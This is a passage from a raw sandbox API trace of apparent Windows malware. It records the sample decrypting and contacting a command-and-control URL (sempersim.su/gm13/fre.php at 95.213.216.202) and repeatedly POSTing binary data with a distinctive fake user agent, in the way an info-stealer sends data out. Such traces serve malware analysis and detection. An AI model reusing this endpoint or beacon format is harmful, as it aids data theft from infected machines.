(HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b5a0 [0196.767] socket (af=2, type=1, protocol=6) returned 0x35c [0196.767] connect (s=0x35c, name=0x63ec28*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0196.820] FreeAddrInfoW (pAddrInfo=0x63bf38*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ec28*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0196.820] GetProcessHeap () returned 0x620000 [0196.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63ba08 [0196.821] GetProcessHeap () returned 0x620000 [0196.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0196.821] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0196.822] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0196.822] GetProcessHeap () returned 0x620000 [0196.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0196.822] GetProcessHeap () returned 0x620000 [0196.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0196.824] GetProcessHeap () returned 0x620000 [0196.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x6430e0 [0196.824] GetProcessHeap () returned 0x620000 [0196.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0196.825] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0196.826] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0196.826] GetProcessHeap () returned 0x620000 [0196.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0196.826] GetProcessHeap () returned 0x620000 [0196.826] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0196.826] send (s=0x35c, buf=0x63a880*, len=237, flags=0) returned 237 [0196.827] send (s=0x35c, buf=0x6421e0*, len=159, flags=0) returned 159 [0196.827] GetProcessHeap () returned 0x620000 [0196.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0196.827] recv (in: s=0x35c, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0198.576] GetProcessHeap () returned 0x620000 [0198.577] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0198.577] GetProcessHeap () returned 0x620000 [0198.577] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6430e0 | out: hHeap=0x620000) returned 1 [0198.577] GetProcessHeap () returned 0x620000 [0198.577] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0198.578] GetProcessHeap () returned 0x620000 [0198.578] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ba08 | out: hHeap=0x620000) returned 1 [0198.578] closesocket (s=0x35c) returned 0 [0198.579] GetProcessHeap () returned 0x620000 [0198.579] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b5a0 | out: hHeap=0x620000) returned 1 [0198.579] GetProcessHeap () returned 0x620000 [0198.579] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645630 | out: hHeap=0x620000) returned 1 [0198.579] GetProcessHeap () returned 0x620000 [0198.579] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643368 | out: hHeap=0x620000) returned 1 [0198.580] GetProcessHeap () returned 0x620000 [0198.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0198.580] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xaa8) returned 0x35c [0198.582] Sleep (dwMilliseconds=0xea60) [0198.589] GetProcessHeap () returned 0x620000 [0198.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x6434d0 [0198.590] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0198.591] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0198.596] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0198.597] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0198.606] GetProcessHeap () returned 0x620000 [0198.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638fa8 [0198.607] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0198.607] CryptImportKey (in: hProv=0x63ba08, pbData=0x638fa8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0198.608] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0198.608] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0198.609] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0198.609] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0198.609] GetProcessHeap () returned 0x620000 [0198.609] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638fa8 | out: hHeap=0x620000) returned 1 [0198.610] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0198.610] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6434d0, pdwDataLen=0x19fcfc | out: pbData=0x6434d0, pdwDataLen=0x19fcfc) returned 1 [0198.611] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0198.611] CryptDestroyKey (hKey=0x62d710) returned 1 [0198.612] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0198.612] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0198.612] GetProcessHeap () returned 0x620000 [0198.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645858 [0198.613] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0198.613] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0198.613] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0198.614] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0198.614] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0198.615] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0198.615] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0198.615] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0198.615] GetProcessHeap () returned 0x620000 [0198.615] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633340 [0198.615] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0198.616] GetProcessHeap () returned 0x620000 [0198.616] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633340 | out: hHeap=0x620000) returned 1 [0198.616] GetProcessHeap () returned 0x620000 [0198.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645858 | out: hHeap=0x620000) returned 1 [0198.617] GetProcessHeap () returned 0x620000 [0198.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6434d0 | out: hHeap=0x620000) returned 1 [0198.617] GetProcessHeap () returned 0x620000 [0198.617] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642ee8 [0198.618] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0198.618] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0198.626] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0198.626] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0198.633] GetProcessHeap () returned 0x620000 [0198.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639038 [0198.634] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0198.634] CryptImportKey (in: hProv=0x63b7e8, pbData=0x639038*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0198.635] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0198.635] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0198.636] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0198.636] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0198.636] GetProcessHeap () returned 0x620000 [0198.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639038 | out: hHeap=0x620000) returned 1 [0198.639] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0198.639] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642ee8, pdwDataLen=0x19fcfc | out: pbData=0x642ee8, pdwDataLen=0x19fcfc) returned 1 [0198.640] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0198.640] CryptDestroyKey (hKey=0x62d710) returned 1 [0198.641] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0198.641] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0198.641] GetProcessHeap () returned 0x620000 [0198.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645ca8 [0198.642] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0198.642] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0198.642] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0198.643] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0198.643] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0198.643] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0198.644] GetProcessHeap () returned 0x620000 [0198.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0198.644] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c2d0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eb80*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0198.645] GetProcessHeap () returned 0x620000 [0198.645] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b6a0 [0198.645] socket (af=2, type=1, protocol=6) returned 0x360 [0198.645] connect (s=0x360, name=0x63eb80*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0198.695] FreeAddrInfoW (pAddrInfo=0x63c2d0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eb80*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0198.695] GetProcessHeap () returned 0x620000 [0198.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63b7e8 [0198.696] GetProcessHeap () returned 0x620000 [0198.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0198.697] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0198.698] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0198.698] GetProcessHeap () returned 0x620000 [0198.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0198.698] GetProcessHeap () returned 0x620000 [0198.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0198.699] GetProcessHeap () returned 0x620000 [0198.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643560 [0198.699] GetProcessHeap () returned 0x620000 [0198.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0198.699] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0198.700] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0198.700] GetProcessHeap () returned 0x620000 [0198.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0198.700] GetProcessHeap () returned 0x620000 [0198.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0198.701] send (s=0x360, buf=0x63a880*, len=237, flags=0) returned 237 [0198.701] send (s=0x360, buf=0x6421e0*, len=159, flags=0) returned 159 [0198.701] GetProcessHeap () returned 0x620000 [0198.702] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0198.702] recv (in: s=0x360, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0200.392] GetProcessHeap () returned 0x620000 [0200.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0200.393] GetProcessHeap () returned 0x620000 [0200.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643560 | out: hHeap=0x620000) returned 1 [0200.393] GetProcessHeap () returned 0x620000 [0200.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0200.393] GetProcessHeap () returned 0x620000 [0200.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b7e8 | out: hHeap=0x620000) returned 1 [0200.394] closesocket (s=0x360) returned 0 [0200.394] GetProcessHeap () returned 0x620000 [0200.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6a0 | out: hHeap=0x620000) returned 1 [0200.394] GetProcessHeap () returned 0x620000 [0200.395] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645ca8 | out: hHeap=0x620000) returned 1 [0200.395] GetProcessHeap () returned 0x620000 [0200.395] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642ee8 | out: hHeap=0x620000) returned 1 [0200.395] GetProcessHeap () returned 0x620000 [0200.395] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0200.396] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xb58) returned 0x360 [0200.397] Sleep (dwMilliseconds=0xea60) [0200.401] GetProcessHeap () returned 0x620000 [0200.401] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642f30 [0200.402] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0200.402] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0200.408] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0200.408] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0200.415] GetProcessHeap () returned 0x620000 [0200.416] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0200.419] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0200.419] CryptImportKey (in: hProv=0x63ba08, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0200.420] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0200.421] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0200.421] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0200.421] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0200.422] GetProcessHeap () returned 0x620000 [0200.422] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0200.423] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0200.423] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642f30, pdwDataLen=0x19fcfc | out: pbData=0x642f30, pdwDataLen=0x19fcfc) returned 1 [0200.424] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0200.424] CryptDestroyKey (hKey=0x62d190) returned 1 [0200.425] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0200.425] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0200.425] GetProcessHeap () returned 0x620000 [0200.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645408 [0200.426] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0200.426] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0200.427] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0200.427] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0200.428] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0200.429] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0200.429] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0200.430] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0200.430] GetProcessHeap () returned 0x620000 [0200.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0200.430] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0200.430] GetProcessHeap () returned 0x620000 [0200.430] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0200.430] GetProcessHeap () returned 0x620000 [0200.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645408 | out: hHeap=0x620000) returned 1 [0200.431] GetProcessHeap () returned 0x620000 [0200.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642f30 | out: hHeap=0x620000) returned 1 [0200.431] GetProcessHeap () returned 0x620000 [0200.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643200 [0200.432] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0200.433] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0200.440] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0200.441] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0200.451] GetProcessHeap () returned 0x620000 [0200.451] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x6390f8 [0200.452] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0200.452] CryptImportKey (in: hProv=0x63b7e8, pbData=0x6390f8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0200.453] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0200.453] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0200.454] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0200.454] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0200.454] GetProcessHeap () returned 0x620000 [0200.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6390f8 | out: hHeap=0x620000) returned 1 [0200.455] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0200.456] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643200, pdwDataLen=0x19fcfc | out: pbData=0x643200, pdwDataLen=0x19fcfc) returned 1 [0200.456] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0200.457] CryptDestroyKey (hKey=0x62d190) returned 1 [0200.457] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0200.458] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0200.458] GetProcessHeap () returned 0x620000 [0200.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645a80 [0200.459] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0200.459] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0200.460] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0200.460] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0200.461] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0200.461] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0200.461] GetProcessHeap () returned 0x620000 [0200.461] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0200.461] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c0f0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ead8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0200.463] GetProcessHeap () returned 0x620000 [0200.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b5d0 [0200.463] socket (af=2, type=1, protocol=6) returned 0x364 [0200.463] connect (s=0x364, name=0x63ead8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0200.518] FreeAddrInfoW (pAddrInfo=0x63c0f0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ead8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0200.518] GetProcessHeap () returned 0x620000 [0200.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63ba08 [0200.518] GetProcessHeap () returned 0x620000 [0200.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0200.519] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0200.520] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0200.520] GetProcessHeap () returned 0x620000 [0200.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0200.520] GetProcessHeap () returned 0x620000 [0200.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0200.520] GetProcessHeap () returned 0x620000 [0200.520] RtlAllocateHeap (HeapHandle=0x620000, 